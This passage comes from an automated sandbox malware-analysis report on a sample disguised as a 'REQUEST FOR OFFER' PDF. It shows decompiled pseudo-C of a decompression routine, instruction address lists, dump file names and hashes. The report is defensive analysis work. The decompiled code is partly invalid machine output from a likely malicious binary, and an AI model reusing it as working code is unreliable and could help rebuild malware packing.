										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406f10
0x00406f10
0x00406f14
0x00406f39
0x00406f43
0x00000000
0x00406f16
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f23
0x00406f27
0x00406f27
0x00406f2a
0x00407004
0x00407004
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00406fc2
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f97
0x00406f9b
0x0040714a
0x00000000
0x0040714a
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00000000
0x00406967
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00000000
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00000000
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00000000
0x00406cb2
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00406f46
0x00406f46
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00000000
0x00406ffd
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00000000
0x00000000
0x004070be
0x004070c1
0x00406fc2
0x00406fc2
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00000000
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x00407160
0x00407166
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000
0x00407175
0x00406fc2
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x0040709f
0x00000000
0x00406f14

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
Instruction ID: 6aec0e073e41beee5660f1704474c6018554c7323141eb4488ca3ed34e09e74f
Opcode Fuzzy Hash: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
Instruction Fuzzy Hash: 71913271D04229CBDF28CFA8C854BADBBB1FF44305F14816AD856BB291C7786986CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406C26 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C26() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M0040717D))) {
						case 0:
